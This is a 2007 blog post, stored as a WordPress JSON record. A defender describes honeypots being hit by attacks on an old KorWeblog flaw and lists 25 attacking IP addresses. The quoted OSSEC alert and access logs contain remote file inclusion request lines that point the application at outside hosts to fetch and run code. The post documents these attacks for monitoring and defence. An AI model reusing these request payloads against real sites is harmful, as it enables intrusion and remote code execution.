{"id":260,"date":"2007-06-27T03:13:00","date_gmt":"2007-06-27T03:13:00","guid":{"rendered":"https:\/\/defragged.org\/ossec\/?p=260"},"modified":"2020-07-03T03:14:13","modified_gmt":"2020-07-03T03:14:13","slug":"hammered-by-web-attacks-korweblog","status":"publish","type":"post","link":"https:\/\/defragged.org\/ossec\/2007\/06\/hammered-by-web-attacks-korweblog\/","title":{"rendered":"Hammered by web attacks (KorWeblog)"},"content":{"rendered":"\n<p>Some of my web honeypots are being hammered by attacks against&nbsp;<a href=\"http:\/\/secunia.com\/advisories\/13700\/\">KorWeblog<\/a>. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.<\/p>\n\n\n\n<p>Example of alert from&nbsp;<a href=\"http:\/\/www.ossec.net\/\">ossec<\/a>:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>OSSEC HIDS Notification.<br>2007 Jun 27 17:07:30<\/p><p>Received From: xx-&gt;\/var\/log\/httpd\/xx.access.log<br>Rule: 31106 fired (level 12) -&gt; \u201cA web attack returned code 200 (success).\u201d<br>Portion of the log(s):<\/p><p>8.10.120.85 \u2013 &#8211; [27\/Jun\/2007:17:07:29 -0300] \u201cGET \/install\/index.php?lng=..\/..\/include\/main.inc&amp;G_PATH=http:\/\/nicksom2d.sytes.net\/ex\/echo? HTTP\/1.1\u2033 200 6349 \u201c-\u201d \u201clibwww-perl\/5.805\u2033<\/p><\/blockquote>\n\n\n\n<p>Just one honeypot (yes, one) in the last few days was \u201cattacked\u201d by the following IPs (25 different):<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>189.1.168.118<br>200.193.146.100<br>200.219.150.6<br>202.123.27.136<br>203.55.214.70<br>207.150.188.50<br>207.226.179.98<br>209.216.205.81<br>210.188.204.198<br>211.247.239.10<br>213.194.149.130<br>216.7.185.31<br>217.170.66.240<br>218.228.196.88<br>218.239.223.225<br>221.127.101.45<br>62.193.237.43<br>62.75.163.196<br>65.98.58.2<br>72.232.219.205<br>8.10.120.85<br>83.103.57.13<br>83.217.84.88<br>85.125.233.222<br>89.110.144.202<\/p><\/blockquote>\n\n\n\n<p>The logs look all the same:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>200.193.146.100 \u2013 &#8211; [26\/Jun\/2007:16:37:37 -0300] \u201cGET \/*install\/index.php?lng=..\/..\/include\/main.inc&amp;G_PATH=http:\/\/www.thiaguinho.net\/id.txt? HTTP\/1.1\u2033 200 6351 \u201c-\u201d \u201clibwww-perl\/5.79\u2033<br>8.10.120.85 \u2013 &#8211; [27\/Jun\/2007:17:07:29 -0300] \u201cGET \/install\/index.php?lng=..\/..\/include\/main.inc&amp;G_PATH=http:\/\/nicksom2d.sytes.net\/ex\/echo? HTTP\/1.1\u2033 200 6349 \u201c-\u201d \u201clibwww-perl\/5.805\u2033<\/p><\/blockquote>\n\n\n\n<p>I posted a few of the sites that were found at the&nbsp;<a href=\"http:\/\/www.ossec.net\/wiki\/index.php\/WebAttacks_links\">WebAttacks Links<\/a>&nbsp;in the ossec wiki.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Some of my web honeypots are being hammered by attacks against&nbsp;KorWeblog. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me. Example of alert from&nbsp;ossec: OSSEC HIDS Notification.2007 Jun 27 17:07:30 Received From: xx-&gt;\/var\/log\/httpd\/xx.access.logRule: [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2,3],"tags":[],"_links":{"self":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260"}],"collection":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/comments?post=260"}],"version-history":[{"count":1,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260\/revisions"}],"predecessor-version":[{"id":261,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/260\/revisions\/261"}],"wp:attachment":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/media?parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/categories?post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/tags?post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}